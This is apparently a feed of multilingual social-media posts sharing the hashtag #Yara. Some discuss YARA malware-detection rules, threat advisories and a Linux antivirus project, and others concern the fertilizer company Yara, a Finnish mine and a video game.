Project of the day (day 19) 2023, Sunday, September 10th

#LinuxDefender : https://github.com/seanpm2001/Linux_Defender/

#Linux #Defender is an anti-virus for Linux, with a #WindowsDefender like #interface (which can be turned off when needed) it clears most common Linux desktop malware, but extends to also include #spyware and, depending on how strict you set it to be, it can block the installation of programs like Google Chrome, and other tracking software pieces (they are spyware) along with any #proprietary software.

It is written mostly in #Python with rule sets additionally being written in #YARA it is aimed at being ported to as many Linux distributions as possible. It is early in development, and is not functional yet.

Suomessa ei haluta laatia uutisia, matkailujuttuja, luontojuttuja kontekstiin. Tässäkin hehkutetaan Savon/ Siilinjärven mahtavaa luontoa. Samaan aikaan Timosen ja kaikkien muidenkin Laukansalossa olevien välittömään naapuriin laajenee apatiittikaivos. Merkitty punaisella. Mökit piku pisteitä rannassa. Siitä luonnosta ei jää yhtään mitään jäljelle, kun avolouhos jätekivineen alueen valtaa. #Yara #Siilinjärvi

@nboynorge search for #ndaal #yara #yararules and you will find thousands of rules from us

#Pollution. Amende record pour le fabricant d’engrais #Yara France, près de Saint-Nazaire
https://www.ouest-france.fr/environnement/pollution/pres-de-saint-nazaire-yara-france-devra-verser-519-000-euros-a-letat-pour-ses-rejets-560c34b2-09e5-11ee-b02d-4d4e5863b78e

L’usine d’engrais de Montoir-de-Bretagne, faute de s’être mise aux normes, doit cette fois payer l’astreinte de 519 000 €. Un record.

🚨 #Chinese #APT Alert - #VoltTyphoon - Details and #IOCs 🚨

Remember the #Chinese #spy #balloon that made world news? Check this shit out: https://www.darkreading.com/endpoint/-volt-typhoon-china-backed-apt-infiltrates-us-critical-infrastructure?_mc=NL_DR_EDT_DR_weekly_20230525&cid=NL_DR_EDT_DR_weekly_20230525&sp_aid=116660&elq_cid=38046155&sp_eh=144c4ccfdc4bcabeefa4110f1ea26cecf2a866a1c04b99a946a3df0524ced34c&sp_eh=144c4ccfdc4bcabeefa4110f1ea26cecf2a866a1c04b99a946a3df0524ced34c&utm_source=eloqua&utm_medium=email&utm_campaign=DR_NL_Dark%20Reading%20Weekly_05.25.23&sp_cid=48686&utm_content=DR_NL_Dark%20Reading%20Weekly_05.25.23

#IOCs provided by the #NSA in a #JointAdvisory here: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

#CyberSecurity #Cyberespionage #YARA #Fortinet #SOHO

Yara reduz produção na Europa em meio a preços mais baixos de fertilizantes

Confira! 👇
https://forbes.com.br/forbesagro/2023/04/yara-reduz-producao-na-europa-em-meio-a-precos-mais-baixos-de-fertilizantes/

#Yara #DemandaFertilizantes #Agronegócio #ForbesAgro

Yara e Enbridge planejam fábrica de amônia de US$ 2,9 bilhões no Texas

Confira! 👇
https://forbes.com.br/forbesagro/2023/03/yara-e-enbridge-planejam-fabrica-de-amonia-de-us-29-bilhoes-no-texas/

#Yara #ProduçãoDeAmônia #Enbridge #Negócios #ForbesAgro

Hoy toca ver #YARA y, por supuesto, expresiones regulares!

Puedes ver las transpas (creative commons) en:
https://gitlab.etsit.urjc.es/esoriano/public-slides/-/tree/master/malware-y-amenazas-dirigidas

📧🙄 #Emotet News: Another one of our predictions for the ongoing campaign turns out to be correct: E4 and E5 are now spamming #OneNote lures. We published a #Yara rule on @abuse_ch #Yarahub to detect the .one -> .wsf delivery method.
Yarahub: https://yaraify.abuse.ch/yarahub/rule/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23

#cybersecurity #infosec #blueteam

"Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW" published by Mandiant. #UNC2970, #LIGHTSHIFT, #LIGHTSHOW, #BYOVD, #YARA, #CTI, #OSINT, #LAZARUS https://www.mandiant.com/resources/blog/lightshift-and-lightshow

"Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970" published by Mandiant. #UNC2970, #LIGHTSHOW, #BYOVD, #YARA, #CTI, #OSINT, #LAZARUS https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

🚨 #CVE-2023-21716 is a new criticial #RCE in Microsoft Word exploited through RTF documents. Similar, older exploits are still very popular with threat actors.
We tested the PoC created by @jduck and created a first prototype #yara hunting rule 🔍

Github: https://github.com/SIFalcon/Detection/blob/main/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar

Please keep in mind that this is meant as a hunting rule only and there is certainly potential for tuning.

More on CVE-2023-21716 as reported by @BleepinComputer: https://bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-21716

PoC: https://twitter.com/jduck/status/1632471544935923712

Happy hunting! 🕵️

Didier Stevens also wrote up a #YARA signature to detect suspicious OneNote files with embedded objects.

https://isc.sans.edu/diary/rss/29598

Anyone in the #malwareanalysis #reverseengineering #malware #yara space familiar with methods for finding similarity across 🍎 Macho 🍏malware samples?

We hash things like the (ordered) import table, and the decoded rich header, and look for distinctive toolmarks in the DLL name, and PDB path in Portable Executables. I’m wondering if there are similar avenues already explored by anyone else?

I’m familiar with SymHash from Anomali, but haven’t heard of much other focus on clustering in those manners. Most reporting about Macho malware is focused on analysis of functionality

Finally releasing our new file indexing and search project.

We integrated #ClamAV and #Yara scanning and are archiving suspicious files we come across.

We also look into compressed files.

https://files.leakix.net/?q=infected%3Atrue

Finally releasing our new file indexing and search project.

We integrated #ClamAV and #Yara scanning and are archiving suspicious files we come across.

We also look into compressed files.

https://files.leakix.net/?q=infected%3A

here’s an exploration on the prevalence of shellcode hashes via #yara: http://www.williballenthin.com/post/shellcode-hash-prevalence/ #100DaysofYARA

What a beautiful place for a revolution. #farcry6 #yara #gaming

#DarkBit Ransomware Targets #Israel with Command-Line Options and Optimized Encryption Routines https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel

#ioc #yara #geopolitics

Rarely do I stumble on a truly impressive #yara rule, but the weighted value nature of this one is impressive.

It assigns a "weight" to various strings in PowerShell commands to determine the likelihood of maliciousness in context when the string itself is highly prone to false positives.

#detection